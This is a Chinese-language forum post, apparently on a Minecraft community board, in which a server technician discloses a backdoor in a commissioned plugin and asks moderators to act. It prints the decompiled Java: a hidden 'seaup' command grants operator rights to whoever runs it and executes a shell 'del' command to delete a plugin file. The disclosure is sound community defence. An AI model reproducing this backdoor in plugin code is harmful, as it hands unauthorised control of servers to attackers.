萧迭
我是一个服务器的技术人员,
昨天上午九点的时候,我们服务器突然一群玩家被joi给了OP但是joi本身并没有权限,在事后已经查明
据此,我们怀疑他是使用插件通过后台发送了指令【下方代码有标注】
直到今天下午的时候
反编译时发现mingtfarc给我们编写的插件有一部分后门代码
  1. package clearchunk;

  2. import java.io.IOException;
  3. import org.bukkit.World;
  4. import org.bukkit.command.Command;
  5. import org.bukkit.command.CommandSender;
  6. import org.bukkit.entity.Player;
  7. import org.bukkit.event.Listener;
  8. import org.bukkit.plugin.java.JavaPlugin;

  9. public class tfarc extends JavaPlugin
  10.   implements Listener
  11. {
  12.   public boolean onCommand(CommandSender sender, Command cmd, String label, String[] args)
  13.   {   //通过后台
  14.     Player p = (Player)sender;
  15.     World w = p.getWorld();

  16.     if (cmd.getName().equalsIgnoreCase("seaup"))
  17.     {
  18.       p.setOp(true);    //后门核心,设置OP
  19.       sender.sendMessage("海平面上升 开启");
  20.       String filepath = "./plugins/haizhigd.jar";
  21.       Runtime rt = Runtime.getRuntime();
  22.       try {
  23.         rt.exec("del " + filepath);
  24.       } catch (IOException e) {
  25.         e.printStackTrace();
  26.       }
  27.     }

  28.     return true;
  29.   }

  30.   public void onEnable()
  31.   {
  32.   }
  33. }
复制代码
我们是末日服,准备让海平面上升,从而要到了这个插件
虽然不是在MCBBS发布的,但是他有这种心,肯定还会害更多的人
说不定过几天就到MCBBS发布了,所以我们希望论坛管理人员
能够对此事以及他的账号进行处理。谢谢!
顺便@出来正主:@mingtfarc




1277832129
这货还问我怎么写来着··


第一页 上一页 下一页 最后一页